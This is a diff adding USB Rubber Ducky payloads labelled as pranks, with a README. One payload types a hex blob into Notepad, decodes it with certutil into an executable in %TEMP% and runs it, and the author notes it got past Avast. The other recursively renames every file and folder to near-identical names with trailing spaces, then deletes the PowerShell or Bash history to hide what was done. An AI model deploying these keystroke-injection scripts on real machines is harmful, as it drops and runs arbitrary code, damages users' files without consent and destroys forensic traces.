ctypes.windll.user32.MessageBoxW(None, "However, know that you remain in my heart, yay for DuckyScrip and Hak5. ^^", 'Informazione', 0x40)
|
|
@ -0,0 +1,100 @@
|
|||
REM_BLOCK
|
||||
##################################
|
||||
# #
|
||||
# Title : Pranh(ex) #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
##################################
|
||||
END_REM
|
||||
|
||||
Plug-And-Play <3
|
||||
|
||||
REM_BLOCK
|
||||
Requirements:
|
||||
- Nothing (i know, it's absurd)
|
||||
|
||||
Note:
|
||||
- For the creation of the executable, the hexadecimal code and in general to create this program I stuck to the payload: `Install And Run Any Arbitrary Executable - No Internet And Root Needed`
|
||||
- Tested on Windows 11
|
||||
- Running checked but not blocked by Avast antivirus
|
||||
- Original Python code in assets/pranh(ex).py
|
||||
- Hex content in assets/hexfile.txt
|
||||
- exe file in assets/pranh(ex).exe
|
||||
END_REM
|
||||
|
||||
REM Here you should put your HEX code
|
||||
DEFINE #HEX_CODE example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING notepad.exe
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING #HEX_CODE
|
||||
DELAY 2000
|
||||
ALT F
|
||||
DELAY 1000
|
||||
STRING S
|
||||
DELAY 1000
|
||||
STRINGLN "%TEMP%\pranhex.hex"
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRINGLN certutil -f -decodeHex "%TEMP%\pranhex.hex" "%TEMP%\pranhex.exe"
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 250
|
||||
STRINGLN "%TEMP%\pranhex.exe"
|
||||
ENTER
|
|
@ -0,0 +1,118 @@
|
|||
# Same File Name Prank
|
||||
|
||||
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
|
||||
|
||||
Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
|
||||
|
||||
![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
|
||||
|
||||
> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
|
||||
|
||||
![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
|
||||
|
||||
> What it looks like instead if you turn on the extension view.
|
||||
|
||||
# Index
|
||||
|
||||
1. [Features](#features)
|
||||
2. [Payload Structure](#payload-structure)
|
||||
- [Conditional Target OS Execution](#conditional-target-os-execution)
|
||||
- [PowerShell (Windows)](#powershell-windows)
|
||||
- [Bash (GNU/Linux)](#bash-gnulinux)
|
||||
3. [How to Use](#how-to-use)
|
||||
4. [Why not MacOS?](#why-not-macos)
|
||||
5. [Notes](#notes)
|
||||
6. [Credits](#credits)
|
||||
|
||||
|
||||
## Features
|
||||
- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
|
||||
- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
|
||||
- **Customizable**: Users can modify the base directory path and rename pattern as needed.
|
||||
|
||||
## Payload Structure
|
||||
|
||||
### Conditional Target OS Execution
|
||||
The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
|
||||
- If the target system is **Windows**, the script will execute a PowerShell script.
|
||||
- If the target system is **Linux**, it will execute a Bash script.
|
||||
|
||||
### PowerShell (Windows)
|
||||
For **Windows** systems, the script:
|
||||
- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
|
||||
- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions.
|
||||
|
||||
### Bash (GNU/Linux)
|
||||
For **GNU/Linux** systems, the script:
|
||||
- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
|
||||
- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...).
|
||||
|
||||
## How to Use
|
||||
|
||||
1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
|
||||
- `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
|
||||
|
||||
- `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
|
||||
|
||||
- Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
|
||||
|
||||
- `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
|
||||
|
||||
Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
|
||||
|
||||
Of course, you have to make sure that this folder exists....
|
||||
|
||||
![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
|
||||
|
||||
> How Windows response to the command `cd ./Desktop/Hello/World/`
|
||||
|
||||
![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
|
||||
|
||||
> How Ubuntu response to the command `cd ./Desktop/Hello/World/`
|
||||
|
||||
Consider the maximum length of file names on both Windows and GNU/Linux:
|
||||
|
||||
- [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
|
||||
|
||||
|=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
|
||||
|
||||
- [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
|
||||
|
||||
|=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
|
||||
|
||||
2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
|
||||
|
||||
3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
|
||||
|
||||
## Why not MacOS?
|
||||
|
||||
I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
|
||||
|
||||
If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
|
||||
|
||||
## Notes
|
||||
- Ensure that the specified directories exist on the target machine.
|
||||
- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
|
||||
- Contributions to add support for macOS are welcome.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,222 @@
|
|||
REM_BLOCK
|
||||
#############################################
|
||||
# #
|
||||
# Title : Same File Name Prank #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11; GNU/Linux #
|
||||
# #
|
||||
#############################################
|
||||
END_REM
|
||||
|
||||
REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
|
||||
|
||||
REM %%%%% DEFINE-SECTION %%%%%
|
||||
REM_BLOCK
|
||||
|
||||
Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
|
||||
|
||||
Of course, you have to make sure that this folder exists....
|
||||
|
||||
Payload Settings:
|
||||
#DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
|
||||
|
||||
Consider the maximum length of file names on both Windows and GNU/Linux:
|
||||
- Limit on file name length in bash [closed]
|
||||
|-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
|
||||
- On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
|
||||
|-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
|
||||
|
||||
END_REM
|
||||
DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
|
||||
|
||||
REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
|
||||
REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
|
||||
DEFINE #TARGET_WINDOWS TRUE
|
||||
DEFINE #TARGET_GNU_LINUX FALSE
|
||||
|
||||
REM %%%%% PAYLOAD-SECTION %%%%%
|
||||
|
||||
IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
|
||||
REM %%%%% WINDOWS CODE %%%%%
|
||||
|
||||
REM_BLOCK
|
||||
Credits: Hak5 LLC
|
||||
Website: https://hak5.org/
|
||||
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||
END_REM
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
|
||||
|
||||
function Rename-Directories {
|
||||
param (
|
||||
[string]$path,
|
||||
[ref]$counter
|
||||
)
|
||||
|
||||
$folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
|
||||
foreach ($folder in $folders) {
|
||||
$newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella
|
||||
$newFolderPath = $newFolderName
|
||||
|
||||
$counter.Value++
|
||||
|
||||
Rename-Item -Path $folder.FullName -NewName $newFolderPath
|
||||
Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
|
||||
}
|
||||
}
|
||||
|
||||
function Rename-Files {
|
||||
param (
|
||||
[string]$path,
|
||||
[ref]$counter
|
||||
)
|
||||
$files = Get-ChildItem -Path $path -File -Recurse
|
||||
foreach ($file in $files) {
|
||||
$newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file
|
||||
$newFilePath = "$newFileName" + $file.Extension
|
||||
|
||||
$counter.Value++
|
||||
|
||||
Rename-Item -Path $file.FullName -NewName $newFilePath
|
||||
}
|
||||
}
|
||||
|
||||
$counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||
END_STRINGLN
|
||||
|
||||
ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
|
||||
REM %%%%% GNU/LINUX CODE %%%%%
|
||||
|
||||
REM_BLOCK
|
||||
Credits: Hak5 LLC
|
||||
Website: https://hak5.org/
|
||||
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
|
||||
END_REM
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_BASH
|
||||
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
|
||||
|
||||
rename_directories() {
|
||||
local path=$1
|
||||
local counter=$2
|
||||
|
||||
directories=$(find "$path" -type d | sort -r)
|
||||
|
||||
for dir in $directories; do
|
||||
new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella
|
||||
new_folder_path="$path/$new_folder_name"
|
||||
|
||||
counter=$((counter + 1))
|
||||
|
||||
mv "$dir" "$new_folder_path"
|
||||
done
|
||||
}
|
||||
|
||||
rename_files() {
|
||||
local path=$1
|
||||
local counter=$2
|
||||
|
||||
files=$(find "$path" -type f)
|
||||
|
||||
for file in $files; do
|
||||
extension="${file##*.}"
|
||||
|
||||
new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
|
||||
|
||||
new_file_path="$(dirname "$file")/$new_file_name"
|
||||
|
||||
if [[ "$extension" != "$file" ]]; then
|
||||
new_file_path="$new_file_path.$extension"
|
||||
fi
|
||||
|
||||
counter=$((counter + 1))
|
||||
|
||||
mv "$file" "$new_file_path"
|
||||
done
|
||||
}
|
||||
|
||||
counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
|
||||
END_STRINGLN
|
||||
END_IF
|
Loading…
Reference in New Issue